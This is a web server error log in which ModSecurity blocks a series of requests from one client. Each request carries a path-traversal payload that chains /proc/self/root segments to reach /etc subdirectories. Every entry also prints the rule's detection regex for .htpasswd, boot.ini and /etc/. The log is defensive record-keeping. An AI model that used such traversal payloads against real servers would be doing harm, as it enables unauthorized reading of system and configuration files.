[Fri Mar 20 07:55:14.770323 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:33902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nkvHIg5MgXLBnicP3OgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:16.171853 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:33916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nlPXLqtnMIWvjpaKalwAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:17.483048 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:33918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nlfqxLDW4GITHUkTmbwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:18.823488 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:33924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nll1pVZ5mVmJwsFMwPgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:20.116564 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:44162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nmPqxLDW4GITHUkTmcgAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:21.452221 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:44166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nmeoXxyEfFpUF8f-AsQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:23.680696 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:44168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nmzJ3M9BSuKP7CAYa7AAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:27.348545 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:44180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nn7ninkcc-iUj5ApeZAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:28.671527 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0noNa6ubjKNq_cu4bUEQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:29.977809 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.243.128:48388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0noV1pVZ5mVmJwsFMwRQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:29.978328 2026] [mime_magic:error] [pid 9818:tid 140411540502272] (70014)End of file found: [client 74.7.243.128:48388] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:32.446999 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:48398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0npBCii7xarUs8iHZnkAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:33.766815 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:48406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0npTJ3M9BSuKP7CAYa-wAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:35.131493 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:48422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0np_qxLDW4GITHUkTmeAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:36.484739 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:48428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nqF1pVZ5mVmJwsFMwTwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:38.879098 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:48430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nql1pVZ5mVmJwsFMwVwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:40.132550 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.243.128:36894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nrPqxLDW4GITHUkTmewAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:41.471220 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:36900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nrQF0L0L-SsrnPo5obQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:42.767056 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:36908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nruoXxyEfFpUF8f-AtgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:42.965248 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:36908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nruoXxyEfFpUF8f-AtwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:44.273112 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:36920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nsPHIg5MgXLBnicP3RAAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:46.811688 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:36928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nsgF0L0L-SsrnPo5obwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
